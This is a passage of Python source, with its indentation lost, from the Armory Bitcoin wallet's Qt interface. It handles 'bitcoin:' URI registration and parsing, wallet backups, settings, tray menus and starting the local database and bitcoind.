else:
LOGERROR('File mempool.bin does not exist. Nothing deleted.')
####################################################
def menuSelectImportKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must import an address into a specific wallet. If '
'you do not want to import the key into any available wallet, '
'it is recommended you make a new wallet for this purpose.'
'<br><br>'
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window.'
'<br><br>'
'Keys cannot be imported into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def menuSelectSweepKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must select a wallet into which funds will be swept. '
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window to sweep to that wallet.'
'<br><br>'
'Keys cannot be swept into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def changeNumShow(self):
prefWidth = self.numShowOpts[self.comboNumShow.currentIndex()]
if prefWidth=='All':
self.currLedgMin = 1
self.currLedgMax = self.ledgerSize
self.currLedgWidth = -1
else:
self.currLedgMax = self.currLedgMin + prefWidth - 1
self.currLedgWidth = prefWidth
self.applyLedgerRange()
####################################################
def clickLedgUp(self):
self.currLedgMin -= self.currLedgWidth
self.currLedgMax -= self.currLedgWidth
self.applyLedgerRange()
####################################################
def clickLedgDn(self):
self.currLedgMin += self.currLedgWidth
self.currLedgMax += self.currLedgWidth
self.applyLedgerRange()
####################################################
def applyLedgerRange(self):
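# Clamp the [currLedgMin, currLedgMax] window into [1, ledgerSize],
# shifting the window rather than shrinking it when it runs off an end.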
if self.currLedgMin < 1:
toAdd = 1 - self.currLedgMin
self.currLedgMin += toAdd
self.currLedgMax += toAdd
if self.currLedgMax > self.ledgerSize:
toSub = self.currLedgMax - self.ledgerSize
self.currLedgMin -= toSub
self.currLedgMax -= toSub
self.currLedgMin = max(self.currLedgMin, 1)
self.btnLedgUp.setVisible(self.currLedgMin!=1)
self.btnLedgDn.setVisible(self.currLedgMax!=self.ledgerSize)
self.createCombinedLedger()
####################################################
def openSettings(self):
LOGDEBUG('openSettings')
dlgSettings = DlgSettings(self, self)
dlgSettings.exec_()
####################################################
def setupSystemTray(self):
LOGDEBUG('setupSystemTray')
# Creating a QSystemTray
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon( QIcon(self.iconfile) )
self.sysTray.setVisible(True)
self.sysTray.setToolTip('Armory' + (' [Testnet]' if USE_TESTNET else '') + (' [Regtest]' if USE_REGTEST else ''))
self.connect(self.sysTray, SIGNAL('messageClicked()'), self.bringArmoryToFront)
self.connect(self.sysTray, SIGNAL('activated(QSystemTrayIcon::ActivationReason)'), \
self.sysTrayActivated)
menu = QMenu(self)
def traySend():
self.bringArmoryToFront()
self.clickSendBitcoins()
def trayRecv():
self.bringArmoryToFront()
self.clickReceiveCoins()
actShowArmory = self.createAction(self.tr('Show Armory'), self.bringArmoryToFront)
actSendBtc = self.createAction(self.tr('Send Bitcoins'), traySend)
actRcvBtc = self.createAction(self.tr('Receive Bitcoins'), trayRecv)
actClose = self.createAction(self.tr('Quit Armory'), self.closeForReal)
# Create a short menu of options
menu.addAction(actShowArmory)
menu.addAction(actSendBtc)
menu.addAction(actRcvBtc)
menu.addSeparator()
menu.addAction(actClose)
self.sysTray.setContextMenu(menu)
self.notifyQueue = []
self.notifyBlockedUntil = 0
#############################################################################
@AllowAsync
def registerBitcoinWithFF(self):
#the 3 nodes needed to add to register bitcoin as a protocol in FF
rdfschemehandler = 'about=\"urn:scheme:handler:bitcoin\"'
rdfscheme = 'about=\"urn:scheme:bitcoin\"'
rdfexternalApp = 'about=\"urn:scheme:externalApplication:bitcoin\"'
#find mimeTypes.rdf file
rdfs_found = glob.glob(
os.path.join(
os.path.expanduser("~"),
".mozilla",
"firefox",
"*",
"mimeTypes.rdf"
)
)
for rdfs in rdfs_found:
if rdfs:
try:
FFrdf = open(rdfs, 'r+')
except IOError:
continue
ct = FFrdf.readlines()
rdfsch=-1
rdfsc=-1
rdfea=-1
i=0
#look for the nodes
for line in ct:
if rdfschemehandler in line:
rdfsch=i
elif rdfscheme in line:
rdfsc=i
elif rdfexternalApp in line:
rdfea=i
i+=1
#seek to end of file
FFrdf.seek(-11, 2)
i = 0
#add the missing nodes
if rdfsch == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:handler:bitcoin\"\n')
FFrdf.write(' NC:alwaysAsk=\"false\">\n')
FFrdf.write(' <NC:externalApplication RDF:resource=\"urn:scheme:externalApplication:bitcoin\"/>\n')
FFrdf.write(' <NC:possibleApplication RDF:resource=\"urn:handler:local:/usr/bin/xdg-open\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfsc == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:bitcoin\"\n')
FFrdf.write(' NC:value=\"bitcoin\">\n')
FFrdf.write(' <NC:handlerProp RDF:resource=\"urn:scheme:handler:bitcoin\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfea == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:externalApplication:bitcoin\"\n')
FFrdf.write(' NC:prettyName=\"xdg-open\"\n')
FFrdf.write(' NC:path=\"/usr/bin/xdg-open\" />\n')
i+=1
if i != 0:
FFrdf.write('</RDF:RDF>\n')
FFrdf.close()
#############################################################################
def setupUriRegistration(self, justDoIt=False):
"""
Setup Armory as the default application for handling bitcoin: links
"""
LOGINFO('setupUriRegistration')
if USE_TESTNET or USE_REGTEST:
return
if OS_LINUX:
out,err = execAndWait('gconftool-2 --get /desktop/gnome/url-handlers/bitcoin/command')
out2,err = execAndWait('xdg-mime query default x-scheme-handler/bitcoin')
#check FF protocol association
#checkFF_thread = threading.Thread(target=self.registerBitcoinWithFF)
#checkFF_thread.start()
self.registerBitcoinWithFF(async=True)
def setAsDefault():
LOGINFO('Setting up Armory as default URI handler...')
execAndWait('gconftool-2 -t string -s /desktop/gnome/url-handlers/bitcoin/command "python2 %s \"%%s\""' % __file__)
execAndWait('gconftool-2 -s /desktop/gnome/url-handlers/bitcoin/needs_terminal false -t bool')
execAndWait('gconftool-2 -t bool -s /desktop/gnome/url-handlers/bitcoin/enabled true')
execAndWait('xdg-mime default armory.desktop x-scheme-handler/bitcoin')
if ('no value' in out.lower() or 'no value' in err.lower()) and not 'armory.desktop' in out2.lower():
# Silently add Armory if it's never been set before
setAsDefault()
elif (not 'armory' in out.lower() or not 'armory.desktop' in out2.lower()) and not self.firstLoad:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
if not self.getSettingOrSetDefault('DNAA_DefaultApp', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[0]==True:
setAsDefault()
if reply[1]==True:
self.writeSetting('DNAA_DefaultApp', True)
elif OS_WINDOWS:
# Check for existing registration (user first, then root, if necessary)
action = 'DoNothing'
modulepathname = '"'
if getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
app_path = os.path.join(app_dir, sys.executable)
elif __file__:
return #running from a .py script, not gonna register URI on Windows
#justDoIt = True
import ctypes
GetModuleFileNameW = ctypes.windll.kernel32.GetModuleFileNameW
GetModuleFileNameW.restype = ctypes.c_int
app_path = ctypes.create_string_buffer(1024)
rtlength = ctypes.c_int()
rtlength = GetModuleFileNameW(None, ctypes.byref(app_path), 1024)
passstr = str(app_path.raw)
modulepathname += unicode(passstr[0:(rtlength*2)], encoding='utf16') + u'" "%1"'
modulepathname = modulepathname.encode('utf8')
rootKey = 'bitcoin\\shell\\open\\command'
try:
userKey = 'Software\\Classes\\' + rootKey
registryKey = OpenKey(HKEY_CURRENT_USER, userKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
if val.lower()==modulepathname.lower():
LOGINFO('Armory already registered for current user. Done!')
return
else:
action = 'DoIt' #armory is registered, but to another path
else:
# Already set to something (at least created, which is enough)
action = 'AskUser'
except:
# No user-key set, check if root-key is set
try:
registryKey = OpenKey(HKEY_CLASSES_ROOT, rootKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
LOGINFO('Armory already registered at admin level. Done!')
return
else:
# Root key is set (or at least created, which is enough)
action = 'AskUser'
except:
action = 'DoIt'
dontAsk = self.getSettingOrSetDefault('DNAA_DefaultApp', False)
dontAskDefault = self.getSettingOrSetDefault('AlwaysArmoryURI', False)
if justDoIt:
LOGINFO('URL-register: just doing it')
action = 'DoIt'
elif dontAsk and dontAskDefault:
LOGINFO('URL-register: user wants to do it by default')
action = 'DoIt'
elif action=='AskUser' and not self.firstLoad and not dontAsk:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[1]==True:
LOGINFO('URL-register: do not ask again: always %s', str(reply[0]))
self.writeSetting('DNAA_DefaultApp', True)
self.writeSetting('AlwaysArmoryURI', reply[0])
if reply[0]==True:
action = 'DoIt'
else:
LOGINFO('User requested not to use Armory as URI handler')
return
# Finally, do it if we're supposed to!
LOGINFO('URL-register action: %s', action)
if action=='DoIt':
LOGINFO('Registering Armory for current user')
baseDir = os.path.dirname(unicode(passstr[0:(rtlength*2)], encoding='utf16'))
regKeys = []
regKeys.append(['Software\\Classes\\bitcoin', '', 'URL:bitcoin Protocol'])
regKeys.append(['Software\\Classes\\bitcoin', 'URL Protocol', ""])
regKeys.append(['Software\\Classes\\bitcoin\\shell', '', None])
regKeys.append(['Software\\Classes\\bitcoin\\shell\\open', '', None])
for key,name,val in regKeys:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
regKeysU = []
regKeysU.append(['Software\\Classes\\bitcoin\\shell\\open\\command', '', \
modulepathname])
regKeysU.append(['Software\\Classes\\bitcoin\\DefaultIcon', '', \
'"%s\\armory48x48.ico"' % baseDir])
for key,name,val in regKeysU:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
#hKey = ctypes.c_int(registryKey.handle)
#ctypes.windll.Advapi32.RegSetValueEx(hKey, None, 0, REG_SZ, val, (len(val)+1))
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
#############################################################################
def warnNewUSTXFormat(self):
if not self.getSettingOrSetDefault('DNAA_Version092Warn', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Warning, self.tr("Version Warning"), self.tr(
'Since Armory version 0.92 the formats for offline transaction '
'operations have changed to accommodate multi-signature '
'transactions. This format is <u>not</u> compatible with '
'versions of Armory before 0.92. '
'<br><br>'
'To continue, the other system will need to be upgraded to '
'version 0.92 or later. If you cannot upgrade the other '
'system, you will need to reinstall an older version of Armory '
'on this system.'), dnaaMsg=self.tr('Do not show this warning again'))
self.writeSetting('DNAA_Version092Warn', reply[1])
#############################################################################
def execOfflineTx(self):
self.warnNewUSTXFormat()
dlgSelect = DlgOfflineSelect(self, self)
if dlgSelect.exec_():
# If we got here, one of three buttons was clicked.
if dlgSelect.do_create:
DlgSendBitcoins(self.getSelectedWallet(), self, self,
onlyOfflineWallets=True).exec_()
elif dlgSelect.do_broadc:
DlgSignBroadcastOfflineTx(self,self).exec_()
#############################################################################
def sizeHint(self):
return QSize(1000, 650)
#############################################################################
def openToolsDlg(self):
QMessageBox.information(self, self.tr('No Tools Yet!'),
self.tr('The developer tools are not available yet, but will be added '
'soon. Regardless, developer-mode still offers lots of '
'extra information and functionality that is not available in '
'Standard or Advanced mode.'), QMessageBox.Ok)
#############################################################################
def execIntroDialog(self):
if not self.getSettingOrSetDefault('DNAA_IntroDialog', False):
dlg = DlgIntroMessage(self, self)
result = dlg.exec_()
if dlg.chkDnaaIntroDlg.isChecked():
self.writeSetting('DNAA_IntroDialog', True)
if dlg.requestCreate:
self.startWalletWizard()
if dlg.requestImport:
self.execImportWallet()
#############################################################################
def makeWalletCopy(self, parent, wlt, copyType='Same', suffix='', changePass=False):
'''Create a digital backup of your wallet.'''
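# copyType is one of 'Same', 'Decrypt', 'Encrypt' or 'PKCC' (compared
# case-insensitively below); 'PKCC' exports the root public key rather
# than a .wallet file.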
if changePass:
LOGERROR('Changing password is not implemented yet!')
raise NotImplementedError
# Set the file name.
export_rootpubkey = False
if copyType.lower()=='pkcc':
fn = 'armory_%s.%s' % (wlt.uniqueIDB58, suffix)
export_rootpubkey = True
else:
fn = 'armory_%s_%s.wallet' % (wlt.uniqueIDB58, suffix)
if wlt.watchingOnly and copyType.lower() != 'pkcc':
fn = 'armory_%s_%s_WatchOnly.wallet' % (wlt.uniqueIDB58, suffix)
if export_rootpubkey is True:
savePath = unicode(self.getFileSave(defaultFilename=fn,
ffilter=['Root Pubkey Text Files (*.rootpubkey)']))
else:
savePath = unicode(self.getFileSave(defaultFilename=fn))
if not len(savePath) > 0:
return False
# Create the file based on the type you want.
if copyType.lower()=='same':
wlt.writeFreshWalletFile(savePath)
elif copyType.lower()=='decrypt':
if wlt.useEncryption:
dlg = DlgUnlockWallet(wlt, parent, self, 'Unlock Private Keys')
if not dlg.exec_():
return False
# Wallet should now be unlocked
wlt.makeUnencryptedWalletCopy(savePath)
elif copyType.lower()=='encrypt':
newPassphrase=None
if not wlt.useEncryption:
dlgCrypt = DlgChangePassphrase(parent, self, not wlt.useEncryption)
if not dlgCrypt.exec_():
QMessageBox.information(parent, self.tr('Aborted'), self.tr(
'No passphrase was selected for the encrypted backup. '
'No backup was created.'), QMessageBox.Ok)
return False
newPassphrase = SecureBinaryData(str(dlgCrypt.edtPasswd1.text()))
wlt.makeEncryptedWalletCopy(savePath, newPassphrase)
elif copyType.lower() == 'pkcc':
wlt.writePKCCFile(savePath)
else:
LOGERROR('Invalid "copyType" supplied to makeWalletCopy: %s', copyType)
return False
QMessageBox.information(parent, self.tr('Backup Complete'), self.tr(
'Your wallet was successfully backed up to the following '
'location:<br><br>%1').arg(savePath), QMessageBox.Ok)
return True
#############################################################################
def createAction(self, txt, slot, isCheckable=False, \
ttip=None, iconpath=None, shortcut=None):
"""
Modeled from the "Rapid GUI Programming with Python and Qt" book, page 174
"""
icon = QIcon()
if iconpath:
icon = QIcon(iconpath)
theAction = QAction(icon, txt, self)
if isCheckable:
theAction.setCheckable(True)
self.connect(theAction, SIGNAL('toggled(bool)'), slot)
else:
self.connect(theAction, SIGNAL('triggered()'), slot)
if ttip:
theAction.setToolTip(ttip)
theAction.setStatusTip(ttip)
if shortcut:
theAction.setShortcut(shortcut)
return theAction
#############################################################################
def setUserMode(self, mode):
LOGINFO('Changing usermode:')
LOGINFO(' From: %s', self.settings.get('User_Mode'))
self.usermode = mode
if mode==USERMODE.Standard:
self.writeSetting('User_Mode', 'Standard')
if mode==USERMODE.Advanced:
self.writeSetting('User_Mode', 'Advanced')
if mode==USERMODE.Expert:
self.writeSetting('User_Mode', 'Expert')
LOGINFO(' To: %s', self.settings.get('User_Mode'))
if not self.firstModeSwitch:
QMessageBox.information(self,self.tr('Restart Armory'),
self.tr('You may have to restart Armory for all aspects of '
'the new usermode to go into effect.'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def setLang(self, lang):
LOGINFO('Changing language:')
LOGINFO(' From: %s', self.settings.get('Language'))
self.language = lang
self.writeSetting("Language", lang)
LOGINFO(' To: %s', self.settings.get('Language'))
if not self.firstModeSwitch:
QMessageBox.information(self, self.tr('Restart Armory'),
self.tr('You will have to restart Armory for the new language to go into effect'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def getPreferredDateFormat(self):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
globalDefault = binary_to_hex(DEFAULT_DATE_FORMAT)
fmt = self.getSettingOrSetDefault('DateFormat', globalDefault)
return hex_to_binary(str(fmt)) # short hex strings could look like int()
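# Round-trip example (format string is hypothetical): a format like
# '%Y-%b-%d %I:%M%p' is persisted as binary_to_hex(fmt) and decoded
# back here, so '%' and other special symbols never reach the
# SettingsFile parser directly.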
#############################################################################
def setPreferredDateFormat(self, fmtStr):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
try:
unixTimeToFormatStr(1000000000, fmtStr)
except:
QMessageBox.warning(self, self.tr('Invalid Date Format'),
self.tr('The date format you specified was not valid. Please re-enter '
'it using only the strftime symbols shown in the help text.'), QMessageBox.Ok)
return False
self.writeSetting('DateFormat', binary_to_hex(fmtStr))
return True
#############################################################################
def triggerProcessMutexNotification(self, uriLink):
self.bringArmoryToFront()
uriDict = parseBitcoinURI(uriLink)
if len(uriDict) > 0:
self.uriLinkClicked(uriLink)
#############################################################################
def acquireProcessMutex(self):
LOGINFO('acquiring process mutex...')
self.connect(self, SIGNAL("processMutexNotification"), \
self.triggerProcessMutexNotification)
# Prevent Armory from being opened twice
def uriClick_partial(a):
self.emit(SIGNAL("processMutexNotification"), a)
if CLI_OPTIONS.interport > 1:
from armoryengine.ProcessMutex import PySide_ProcessMutex
self.prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, uriClick_partial)
if self.prc_mutex.acquire() == False:
LOGWARN('Socket already occupied! This must be a duplicate Armory')
QMessageBox.warning(self, self.tr('Already Open'), self.tr(
'Armory is already running! You can only have one Armory open '
'at a time. Exiting...'), QMessageBox.Ok)
os._exit(0)
else:
LOGWARN('*** Listening port is disabled. URI-handling will not work')
self.internetStatus = INTERNET_STATUS.DidNotCheck
############################################################################
def startArmoryDBIfNecessary(self):
if CLI_OPTIONS.offline:
LOGWARN("Offline instance, not startig the DB")
return False
try:
if TheBDM.hasRemoteDB() == False:
#check there is no local db
localDBPort = Cpp.BlockDataManagerConfig_hasLocalDB(\
str(ARMORY_HOME_DIR), armoryengine.ArmoryUtils.ARMORYDB_PORT)
if len(localDBPort) > 0:
armoryengine.ArmoryUtils.ARMORYDB_PORT = localDBPort
return True
#look for cookie file and delete it
cookiePath = os.path.join(ARMORY_HOME_DIR, ".cookie_")
if os.path.exists(cookiePath):
os.remove(cookiePath)
#If we got this far, we need to spawn a local db
self.setSatoshiPaths()
TheSDM.spawnDB(str(ARMORY_HOME_DIR), TheBDM.armoryDBDir)
#wait for cookie file creation
while not os.path.exists(cookiePath):
time.sleep(0.1)
#get port from cookie
armoryengine.ArmoryUtils.ARMORYDB_PORT = \
Cpp.BlockDataManagerConfig_getPortFromCookie(str(ARMORY_HOME_DIR))
#test if db has started
if Cpp.BlockDataManagerConfig_testConnection(\
ARMORYDB_IP, armoryengine.ArmoryUtils.ARMORYDB_PORT) == False:
LOGERROR("Failed to spawn ArmoryDB")
return False
LOGINFO("Connecting on port %s" % armoryengine.ArmoryUtils.ARMORYDB_PORT)
else:
LOGWARN("DB is already running")
return True
except Exception as e:
LOGEXCEPT('Failed to start Armory database: %s' % str(e))
return False
############################################################################
def startBitcoindIfNecessary(self):
LOGINFO('startBitcoindIfNecessary')
TheSDM.checkDBIsLocal()
if self.internetStatus == INTERNET_STATUS.Unavailable or \
CLI_OPTIONS.offline:
LOGWARN('Not online, will not start bitcoind')
return False
if TheBDM.hasRemoteDB() or not self.doAutoBitcoind:
return False
if TheSDM.satoshiIsAvailable():
LOGWARN('Tried to start bitcoind, but satoshi already running')
return False
self.setSatoshiPaths()
try:
# "satexe" is actually just the install directory, not the direct
# path to the executable. That dir tree will be searched for bitcoind
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
TheSDM.startBitcoind()
LOGDEBUG('Bitcoind started without error')
return True
except:
LOGEXCEPT('Failed to setup SDM')
self.switchNetworkMode(NETWORKMODE.Offline)
############################################################################
def notifyBitcoindIsReady(self):
self.signalExecution.executeMethod(\
self.completeBlockchainProcessingInitialization)
############################################################################
def setSatoshiPaths(self):
LOGINFO('setSatoshiPaths')
# We skip the getSettingOrSetDefault call, because we don't want to set
# it if it doesn't exist
if self.settings.hasSetting('SatoshiExe'):
if not os.path.exists(self.settings.get('SatoshiExe')):
LOGERROR('Bitcoin installation setting is a non-existent directory')
self.satoshiExeSearchPath = [self.settings.get('SatoshiExe')]
else:
self.satoshiExeSearchPath = []
self.satoshiHomePath = BTC_HOME_DIR
if self.settings.hasSetting('SatoshiDatadir'):
# This setting overrides BTC_HOME_DIR only if it wasn't explicitly
# set on the command line.
manageSatoshi = self.settings.get('ManageSatoshi')
if manageSatoshi == True:
self.satoshiHomePath = str(self.settings.get('SatoshiDatadir'))
LOGINFO('Setting satoshi datadir = %s' % self.satoshiHomePath)
TheBDM.setSatoshiDir(self.satoshiHomePath)
TheSDM.setSatoshiDir(self.satoshiHomePath)
############################################################################
# This version of the online-mode check doesn't hit the internet every time
def isOnlineModePossible(self):
return self.internetStatus != INTERNET_STATUS.Unavailable and \
TheSDM.satoshiIsAvailable() and \
os.path.exists(os.path.join(TheBDM.btcdir, 'blocks'))
############################################################################
def loadBlockchainIfNecessary(self):
LOGINFO('loadBlockchainIfNecessary')
if self.netMode != NETWORKMODE.Offline:
# Track number of times we start loading the blockchain.
# We will decrement the number when loading finishes
# We can use this to detect problems with mempool or blkxxxx.dat
self.numTriesOpen = self.getSettingOrSetDefault('FailedLoadCount', 0)
if self.numTriesOpen>2:
self.loadFailedManyTimesFunc(self.numTriesOpen)
self.settings.set('FailedLoadCount', self.numTriesOpen+1)
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
#############################################################################
def switchNetworkMode(self, newMode):
LOGINFO('Setting netmode: %s', newMode)
self.netMode=newMode
return
#############################################################################
def parseUriLink(self, uriStr, click=True):
if len(uriStr) < 1:
QMessageBox.critical(self, self.tr('No URL String'),
self.tr('You have not entered a URL String yet. '
'Please go back and enter a URL String.'), QMessageBox.Ok)
return {}
LOGINFO('URI link clicked!')
LOGINFO('The following URI string was parsed:')
LOGINFO(uriStr.replace('%','%%'))
try:
uriDict = parseBitcoinURI(uriStr)
except:
# malformed uri, make the dict empty, which will trigger the warning
uriDict = {}
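# A well-formed link is BIP-21 style, e.g. (address is a placeholder):
#    bitcoin:<address>?amount=0.1&label=Example
# parseBitcoinURI is expected to return a dict keyed by the URI fields
# ('address', 'amount', 'label', ...); everything below hinges on
# 'address' being present.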
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
LOGERROR('Clicked or entered "bitcoin:" link in offline mode.')
self.bringArmoryToFront()
if click:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You clicked on a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You entered a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
return {}
if len(uriDict)==0:
if click:
warnMsg = (self.tr('It looks like you just clicked a "bitcoin:" link, but that link is malformed.'))
else:
warnMsg = (self.tr('It looks like you just entered a "bitcoin:" link, but that link is malformed.'))
if self.usermode == USERMODE.Standard:
warnMsg += (self.tr('Please check the source of the link and enter the transaction manually.'))
else:
warnMsg += self.tr('The raw URI string is:\n\n') + uriStr
QMessageBox.warning(self, self.tr('Invalid URI'), warnMsg, QMessageBox.Ok)
LOGERROR(warnMsg.replace('\n', ' '))
return {}
if not uriDict.has_key('address'):
if click:
QMessageBox.warning(self, self.tr('Invalid URI'),
self.tr('The "bitcoin:" link you just clicked '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Invalid URI'),
self.tr('The "bitcoin:" link you just entered '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
LOGERROR('No address in "bitcoin:" link! Nothing to do!')
return {}
# Verify the URI is for the same network as this Armory instance
theAddrByte = checkAddrType(base58_to_binary(uriDict['address']))
if theAddrByte!=-1 and not theAddrByte in [ADDRBYTE, P2SHBYTE]:
net = 'Unknown Network'
if NETWORKS.has_key(theAddrByte):
net = NETWORKS[theAddrByte]
if click:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just clicked is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just entered is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
LOGERROR('URI link is for the wrong network!')
return {}
# If the URI contains "req-" strings we don't recognize, throw error
recognized = ['address','version','amount','label','message']
for key,value in uriDict.iteritems():
if key.startswith('req-') and not key[4:] in recognized:
if click:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just clicked contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you clicked on uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just entered contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you entered uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'), QMessageBox.Ok)
LOGERROR('URI link contains unrecognized req- fields.')
return {}
return uriDict
#############################################################################
def uriLinkClicked(self, uriStr):
LOGINFO('uriLinkClicked')
if TheBDM.getState()==BDM_OFFLINE:
QMessageBox.warning(self, self.tr('Offline'),
self.tr('You just clicked on a "bitcoin:" link, but Armory is offline '
'and cannot send transactions. Please click the link '
'again when Armory is online.'), \
QMessageBox.Ok)
return
elif not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
# BDM isn't ready yet; save URI strings in the delayed URI dict to
# replay later through finishLoadBlockChainGUI
qLen = self.delayedURIData['qLen']
self.delayedURIData[qLen] = uriStr
qLen = qLen +1
self.delayedURIData['qLen'] = qLen
return
uriDict = self.parseUriLink(uriStr, True)
if len(uriDict)>0:
self.bringArmoryToFront()
return self.uriSendBitcoins(uriDict)
#############################################################################
def loadWalletsAndSettings(self, updateProgress):
LOGINFO('loadWalletsAndSettings')
self.getSettingOrSetDefault('First_Load', True)
self.getSettingOrSetDefault('Load_Count', 0)
self.getSettingOrSetDefault('User_Mode', 'Advanced')
self.getSettingOrSetDefault('UnlockTimeout', 10)
self.getSettingOrSetDefault('DNAA_UnlockTimeout', False)
# Determine if we need to do new-user operations, increment load-count
self.firstLoad = False
if self.getSettingOrSetDefault('First_Load', True):
self.firstLoad = True
self.writeSetting('First_Load', False)
self.writeSetting('First_Load_Date', long(RightNow()))
self.writeSetting('Load_Count', 1)
self.writeSetting('AdvFeature_UseCt', 0)
else:
self.writeSetting('Load_Count', (self.settings.get('Load_Count')+1) % 100)
# Set the usermode, default to standard
self.usermode = USERMODE.Standard
if self.settings.get('User_Mode') == 'Advanced':
self.usermode = USERMODE.Advanced
elif self.settings.get('User_Mode') == 'Expert':
self.usermode = USERMODE.Expert
# Set the language, default to English
self.language = 'en'
if self.settings.get('Language') != '':
self.language = self.settings.get('Language')
# The user may have asked to never be notified of a particular
# notification again. We have a short-term list (wiped on every
# load), and a long-term list (saved in settings). We simply
# initialize the short-term list with the long-term list, and add
# short-term ignore requests to it
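# The persisted value is one flat string of concatenated 8-character
# notification IDs, so slice it into fixed-width chunks: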
notifyStr = self.getSettingOrSetDefault('NotifyIgnore', '')
nsz = len(notifyStr)
self.notifyIgnoreLong = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
self.notifyIgnoreShort = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
# Load wallets found in the .armory directory
self.walletMap = {}
self.walletIndices = {}
self.walletIDSet = set()
self.walletManager = None
# I need some linear lists for accessing by index
self.walletIDList = []
self.walletVisibleList = []
self.wltIDList = []
self.combinedLedger = []
self.ledgerSize = 0
self.ledgerTable = []
self.walletSideScanProgress = {}
LOGINFO('Loading wallets...')
wltPaths = readWalletFiles()
wltExclude = self.settings.get('Excluded_Wallets', expectList=True)
ratioPerWallet = 0
if len(wltPaths) > 0:
ratioPerWallet = 100 / float(len(wltPaths))
i = 0
for fpath in wltPaths:
currentProgress = float(i) * ratioPerWallet
updateProgress(currentProgress)
i += 1
def reportProgress(val):
updateProgress(currentProgress + val*ratioPerWallet)
try:
wltLoad = PyBtcWallet().readWalletFile(fpath, \
reportProgress=reportProgress)
wltID = wltLoad.uniqueIDB58
if fpath in wltExclude or wltID in wltExclude:
continue
wltLoaded = True
if wltID in self.walletIDSet:
LOGWARN('***WARNING: Duplicate wallet detected, %s', wltID)
wo1 = self.walletMap[wltID].watchingOnly
wo2 = wltLoad.watchingOnly
if wo1 and not wo2:
prevWltPath = self.walletMap[wltID].walletPath
self.walletMap[wltID] = wltLoad
LOGWARN('First wallet is more useful than the second one...')
LOGWARN(' Wallet 1 (loaded): %s', fpath)
LOGWARN(' Wallet 2 (skipped): %s', prevWltPath)
